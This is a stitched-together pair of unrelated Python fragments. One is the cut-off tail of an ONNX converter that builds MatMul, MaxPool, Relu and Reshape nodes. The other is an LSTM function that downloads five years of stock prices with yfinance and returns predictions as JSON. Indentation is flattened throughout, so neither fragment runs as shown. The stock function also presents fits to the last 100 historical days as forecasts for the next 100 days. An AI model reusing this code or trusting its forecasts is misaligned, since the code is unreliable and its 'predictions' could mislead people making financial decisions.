node = onnx.helper.make_node(
op_type,
inputs=[x.name],
outputs=[opname],
name=opname,
)
return node
def visit_Input(self, operation: operations.Input) -> onnx.ValueInfoProto:
idx = self.op_counts["Input"] = self.op_counts["Input"] + 1
opname = f"Input_{idx}"
shape = np.asarray(operation.shape).tolist()
if shape[0] < 0:
shape[0] = 1
dtype = NUMPY_TO_ONNX_DTYPE[operation.dtype]
node = onnx.helper.make_tensor_value_info(opname, dtype, shape)
self.inputs.append(node)
return node
def visit_MatMul(self, operation: operations.MatMul) -> onnx.NodeProto:
op_type = str(operation)
idx = self.op_counts[op_type] = self.op_counts[op_type] + 1
opname = f"{op_type}_{idx}"
a = self._to_onnx_proto(operation.a, f"{opname}.a")
b = self._to_onnx_proto(operation.b, f"{opname}.b")
node = onnx.helper.make_node(
op_type,
inputs=[a.name, b.name],
outputs=[opname],
name=opname,
)
return node
def visit_MaxPool(self, operation: operations.MaxPool) -> onnx.NodeProto:
op_type = str(operation)
idx = self.op_counts[op_type] = self.op_counts[op_type] + 1
opname = f"{op_type}_{idx}"
x = self._to_onnx_proto(operation.x, f"{opname}.x")
node = onnx.helper.make_node(
op_type,
inputs=[x.name],
outputs=[opname],
kernel_shape=list(operation.kernel_shape),
ceil_mode=operation.ceil_mode,
strides=list(operation.strides),
dilations=list(operation.dilations),
pads=list(operation.pads),
storage_order=operation.storage_order,
name=opname,
)
return node
def visit_Mul(self, operation: operations.Mul) -> onnx.NodeProto:
op_type = str(operation)
idx = self.op_counts[op_type] = self.op_counts[op_type] + 1
opname = f"{op_type}_{idx}"
a = self._to_onnx_proto(operation.a, f"{opname}.a")
b = self._to_onnx_proto(operation.b, f"{opname}.b")
node = onnx.helper.make_node(
op_type,
inputs=[a.name, b.name],
outputs=[opname],
name=opname,
)
return node
def visit_Relu(self, operation: operations.Relu) -> onnx.NodeProto:
idx = self.op_counts["Relu"] = self.op_counts["Relu"] + 1
opname = f"Relu_{idx}"
x = self._to_onnx_proto(operation.x, f"{opname}.x")
node = onnx.helper.make_node(
"Relu", inputs=[x.name], outputs=[opname], name=opname
)
return node
def visit_Reshape(self, operation: operations.Reshape) -> onnx.NodeProto:
idx = self.op_counts["Reshape"] = self.op_counts["Reshape"] + 1
opname = f"Reshape_{idx}"
x = self._to_onnx_proto(operation.x, f"{opname}.x")
shape = self._to_onnx_proto(operation.shape, f"{opname}.shape")
node = onnx.helper.make_node(
"Reshape", inputs=[x.name, shape.name], outputs=[opname], name=opname
)
return node
def visit_Sigmoid(self, operation: operations.Sigmoid) -> onnx.NodeProto:
op_type = str(operation)
idx = self.op_counts[op_type] = self.op_counts[op_type] + 1
opname = f"{op_type}_{idx}"
x = self._to_onnx_proto(operation.x, f"{opname}.x")
node = onnx.helper.make_node(
op_type, inputs=[x.name], outputs=[opname], name=opname
)
return node
def visit_Sub(self, operation: operations.Sub) -> onnx.NodeProto:
op_type = str(operation)
idx = self.op_counts[op_type] = self.op_counts[op_type] + 1
opname = f"{op_type}_{idx}"
a = self._to_onnx_proto(operation.a, f"{opname}.a")
b = self._to_onnx_proto(operation.b, f"{opname}.b")
node = onnx.helper.make_node(
op_type,
inputs=[a.name, b.name],
outputs=[opname],
name=opname,
)
return node
def visit_Tanh(self, operation: operations.Tanh) -> onnx.NodeProto:
op_type = str(operation)
idx = self.op_counts[op_type] = self.op_counts[op_type] + 1
opname = f"{op_type}_{idx}"
x = self._to_onnx_proto(operation.x, f"{opname}.x")
node = onnx.helper.make_node(
op_type, inputs=[x.name], outputs=[opname], name=opname
)
return node
def visit_Transpose(self, operation: operations.Transpose) -> onnx.NodeProto:
idx = self.op_counts["Transpose"] = self.op_counts["Transpose"] + 1
opname = f"Transpose_{idx}"
x = self._to_onnx_proto(operation.x, f"{opname}.x")
node = onnx.helper.make_node(
"Transpose",
inputs=[x.name],
outputs=[opname],
name=opname,
perm=list(operation.permutation),
)
return node
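# Usage sketch (illustrative; assumes `op_graph` is an existing dnnv OperationGraph):
#
#   model = convert(op_graph)             # builds, shape-infers and checks the ModelProto
#   onnx.save(model, "converted.onnx")    # persist it with the standard onnx API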
|
def lstm_prediction(se, stock_symbol):
import pandas as pd
import numpy as np
def fetch_stock_data(se, stock_symbol):
from pandas_datareader import data as pdr
import yfinance as yf
yf.pdr_override()
if se == 'NSE': stock_symbol += ".NS"
return pdr.get_data_yahoo(stock_symbol, period="5y")
from sklearn.preprocessing import MinMaxScaler
from keras.models import Sequential
from keras.layers import Dense, Dropout, LSTM
og_df = fetch_stock_data(se, stock_symbol)
todataframe = og_df.reset_index(inplace=False)
print("\n<----------------------Info of the OG dataset---------------------->")
print(todataframe.info())
print("<-------------------------------------------------------------------->\n")
seriesdata = todataframe.sort_index(ascending=True, axis=0)
new_seriesdata = pd.DataFrame(index=range(0,len(todataframe)),columns=['Date','Close'])
for i in range(0,len(seriesdata)):
new_seriesdata['Date'][i] = seriesdata['Date'][i]
new_seriesdata['Close'][i] = seriesdata['Close'][i]
new_seriesdata.index = new_seriesdata.Date
new_seriesdata.drop('Date', axis=1, inplace=True)
myseriesdataset = new_seriesdata.values
totrain = myseriesdataset
scalerdata = MinMaxScaler(feature_range=(0, 1))
scale_data = scalerdata.fit_transform(myseriesdataset)
x_totrain, y_totrain = [], []
length_of_totrain=len(totrain)
for i in range(60,length_of_totrain):
x_totrain.append(scale_data[i-60:i,0])
y_totrain.append(scale_data[i,0])
x_totrain, y_totrain = np.array(x_totrain), np.array(y_totrain)
x_totrain = np.reshape(x_totrain, (x_totrain.shape[0],x_totrain.shape[1],1))
lstm_model = Sequential()
lstm_model.add(LSTM(units=50, return_sequences=True, input_shape=(x_totrain.shape[1],1)))
lstm_model.add(LSTM(units=50))
lstm_model.add(Dense(1))
lstm_model.compile(loss='mean_squared_error', optimizer='adam')
lstm_model.fit(x_totrain, y_totrain, epochs=1, batch_size=1, verbose=2)
myinputs = new_seriesdata[len(new_seriesdata) - (100) - 60:].values
myinputs = myinputs.reshape(-1,1)
myinputs = scalerdata.transform(myinputs)
tostore_test_result = []
for i in range(60,myinputs.shape[0]):
tostore_test_result.append(myinputs[i-60:i,0])
tostore_test_result = np.array(tostore_test_result)
tostore_test_result = np.reshape(tostore_test_result,(tostore_test_result.shape[0],tostore_test_result.shape[1],1))
myclosing_priceresult = lstm_model.predict(tostore_test_result)
myclosing_priceresult = scalerdata.inverse_transform(myclosing_priceresult)
    datelist = pd.date_range(pd.Timestamp.now().date(), periods=101)[1:]
predicted_df = pd.DataFrame(myclosing_priceresult, columns=['Close'], index=datelist)
result_df = pd.concat([og_df, predicted_df])[['Close']]
result_df = result_df.reset_index(inplace=False)
result_df.columns = ['Date', 'Close']
print("\n<----------------------Info of the RESULT dataset---------------------->")
print(result_df.info())
print("<------------------------------------------------------------------------>\n")
# import matplotlib.pyplot as plt
# plt.plot(result_df['Close'])
# plt.show()
def get_json(df):
import json
import datetime
def convert_timestamp(item_date_object):
if isinstance(item_date_object, (datetime.date, datetime.datetime)):
return item_date_object.strftime("%Y-%m-%d")
dict_ = df.to_dict(orient='records')
return json.dumps(dict_, default=convert_timestamp)
return get_json(result_df)
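# Usage sketch (illustrative; it downloads ~5 years of prices via yfinance, so it needs
# network access, and 'TCS' is just an example NSE ticker symbol):
#
#   result_json = lstm_prediction('NSE', 'TCS')
#   # -> JSON string of [{'Date': 'YYYY-MM-DD', 'Close': ...}, ...] covering the
#   #    historical series followed by 100 predicted days.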
|